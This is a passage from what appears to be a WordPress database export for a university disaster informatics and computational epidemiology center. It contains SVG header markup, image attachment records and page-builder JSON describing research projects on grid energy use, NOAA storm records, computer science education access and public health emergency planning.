d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n            <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 18:36:59','2022-02-16 18:36:59','',22,'https://gsudice.dataconn.net/?p=412',0,'revision','',0),(430,1,'2022-02-18 19:20:15','2022-02-18 19:20:15','','ewsimage','','inherit','open','closed','','ewsimage','','','2022-02-18 19:20:15','2022-02-18 19:20:15','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/ewsimage.png',0,'attachment','image/png',0),(432,1,'2022-02-18 19:22:30','2022-02-18 19:22:30','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-ewsimage.png','cropped-ewsimage.png','','inherit','open','closed','','cropped-ewsimage-png','','','2022-02-18 19:22:30','2022-02-18 19:22:30','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-ewsimage.png',0,'attachment','image/png',0),(433,1,'2022-02-18 19:23:40','2022-02-18 19:23:40','','Unweighted Monday','','inherit','open','closed','','unweighted-monday','','','2022-02-18 19:23:40','2022-02-18 19:23:40','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/Unweighted-Monday.png',0,'attachment','image/png',0),(434,1,'2022-02-18 19:25:08','2022-02-18 19:25:08','','word-cloud','','inherit','open','closed','','word-cloud','','','2022-02-18 19:25:08','2022-02-18 19:25:08','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/word-cloud.png',0,'attachment','image/png',0),(435,1,'2022-02-18 19:25:23','2022-02-18 19:25:23','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-word-cloud.png','cropped-word-cloud.png','','inherit','open','closed','','cropped-word-cloud-png','','','2022-02-18 19:25:23','2022-02-18 19:25:23','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-word-cloud.png',0,'attachment','image/png',0),(436,1,'2022-02-18 19:32:35','2022-02-18 19:32:35','','kevin-ku-w7ZyuGYNpRQ-unsplash','','inherit','open','closed','','kevin-ku-w7zyugynprq-unsplash','','','2022-02-18 19:32:35','2022-02-18 19:32:35','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/kevin-ku-w7ZyuGYNpRQ-unsplash.jpg',0,'attachment','image/jpeg',0),(437,1,'2022-02-18 19:32:45','2022-02-18 19:32:45','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-kevin-ku-w7ZyuGYNpRQ-unsplash-scaled-1.jpg','cropped-kevin-ku-w7ZyuGYNpRQ-unsplash-scaled-1.jpg','','inherit','open','closed','','cropped-kevin-ku-w7zyugynprq-unsplash-scaled-1-jpg','','','2022-02-18 19:32:45','2022-02-18 19:32:45','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-kevin-ku-w7ZyuGYNpRQ-unsplash-scaled-1.jpg',0,'attachment','image/jpeg',0),(438,1,'2022-02-18 19:33:00','2022-02-18 19:33:00','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c40\",\"parentId\":\"126-c39\",\"partialId\":126,\"styleRef\":868,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}}}}},\"id\":\"126-c41\",\"parentId\":\"126-c39\",\"partialId\":126,\"children\":[{\"name\":\"hop-text\",\"parentId\":\"126-c41\",\"index\":2,\"id\":\"126-c44\",\"partialId\":126,\"styleRef\":872,\"type\":\"content\",\"props\":{\"content\":\"<p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes, and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. <\\/p>\"}}],\"styleRef\":869,\"type\":\"content\"}],\"id\":\"126-c39\",\"parentId\":\"126-c38\",\"partialId\":126,\"styleRef\":867,\"type\":\"content\"}],\"id\":\"126-c38\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":866,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"ORPHEUS\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific 